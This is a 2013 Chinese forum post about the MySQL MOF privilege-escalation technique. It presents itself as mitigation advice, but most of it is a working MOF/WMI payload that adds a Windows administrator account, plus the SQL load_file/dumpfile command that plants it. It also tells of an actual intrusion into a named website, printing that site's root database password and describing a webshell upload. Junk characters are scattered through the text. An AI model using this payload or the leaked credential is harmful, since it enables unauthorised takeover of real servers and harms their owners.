Mysql mof扩展漏洞防范方法
7 P6 J0 M5 G8 u
: |- `, E* X& D/ j网上公开的一些利用代码:
* |! R% p4 W8 N( [8 d/ H! @5 [$ }5 y+ y6 z
#pragma namespace(“\\\\.\\root\\subscription”)
Q0 @' s, l+ F3 \* H7 l& E2 v
8 c9 [6 C+ ~/ m* f' c* \: p8 ^instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
( X3 F. r& n: v- w7 q
" o1 n0 h( Y' q! i# m7 A6 z 8 u% E! q* D" F* m, B; A
8 B% y5 Y& ~4 o7 i# X7 ~
4 \ h" _/ F" B% T* f7 k( x! {
3 w' h$ C! M$ k. [/ G- s
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;' E/ E2 @: X9 s/ b. Z" s6 h: S' G
从上面代码来看得出解决办法:3 H" _2 X& q f* f4 M R: r
5 v$ x' o" D# M1 v& k) l& }
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数( b2 j4 f4 T- s" O6 b/ t0 A o
) J6 p" }# C5 t0 y" t2、禁止使用”WScript.Shel”组件& G5 E+ V+ T$ a& l8 b- A) P! L
6 h2 k6 K" y4 s3 H. q, q8 A8 [3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
; B% z8 Y- y; n9 O3 z& w4 |
/ `8 t1 F1 w0 b. n. h+ O1 V当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
; l& [6 s, L( e$ S% A
, ]5 U+ e7 L* G' `( B' a事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权8 j$ X* G. d% d8 Q4 b
9 o$ j3 m( ?) b H. G: k
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容: k4 O% v4 [4 m- h
) w6 R4 F; A4 s" k5 z1 E! R, s看懂了后就开始练手吧
8 \# `( P9 S* c% z2 @) H
( [; T8 o- m- ^# X: m& Y# Zhttp://www.webbmw.com/config/config_ucenter.php 一句话 a+ m8 ^8 l- U6 C$ G$ N: d( m- z* D) C+ o
2 @2 }. p7 N$ i5 `1 S0 V2 X
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。6 Z/ [/ g; s. P' O0 ^
9 k( \6 e7 `6 ]
于是直接用菜刀开搞) }* P7 C( t8 C a9 F$ W5 V( n
+ Q8 J* U4 N" E上马先
1 y5 H% ^" H( A/ P! O* m; W5 t3 Y7 X3 I0 g* A" b% X
既然有了那些账号 之类的 于是我们就执行吧…….( S6 c5 ^) L. @
$ C% _. `0 o) C小小的说下* q) ~* t5 d! N0 Z, s6 D a* ]
0 @/ X6 S* y; \' N& \8 B) r# D在这里第1次执行未成功 原因未知) ?* x6 Z7 W6 P2 O4 ?
* f# n7 R/ G5 ~ H3 u我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。: ]- I% E! p% E
- D B1 K( w2 @9 t: W* k4 ?* _2 \#pragma namespace(“\\\\.\\root\\subscription”), o8 b/ [) J/ j7 q6 v/ R
1 i; i6 n5 \- [0 ~+ K
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };4 A* f2 ?; I$ r1 v' N! E' K
' D9 q. H, ?% k% b, C* N: _我是将文件放到C:\WINDOWS\temp\1.mof
* Z1 C3 T2 Y, J% }2 g- z
+ o& v+ h) X9 t$ B' t! R所以我们就改下执行的代码4 i- B( q- | o7 w; [+ M& M9 z
- v4 y- C0 b6 V0 B: R! I
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;0 \9 E4 J1 `) p% Z3 y8 U' |/ n
$ V3 J+ u9 L2 Y2 _( `5 G
: k4 b P& f% k- J7 i8 x8 Y% |" @; f i3 o( F3 P
但是 你会发现账号还是没有躺在那里。。
' ~6 J% q/ \7 Y( Y, ~( q
5 Y, x. c3 [# N8 U( e7 O于是我就感觉蛋疼
/ b6 `: K3 f& ?# _
8 C" b9 L5 _, q就去一个一个去执行 但是执行到第2个 mysql时就成功了………
/ i& o! y. ] [, d8 E. ^6 T
- T2 S4 w) ?( G' r. y7 M* {$ Z0 a+ I8 e2 F0 \) w% E, C0 O
- C# |9 ^/ ~; {& g
但是其他库均不成功… |0 K$ m7 i/ F
. ]1 F2 L# N9 `9 D5 W( N
我就很费解呀 到底为什么不成功求大牛解答…
+ F5 A; q- Q# ]% u! F- L! m& \. h% v7 ~3 R4 M( A
5 P) }$ Y% B: k4 u3 O% n
/ x' V+ R' j1 Z7 M; i! H1 F |
发表于 2013-1-4 19:49:49
收藏
支持
反对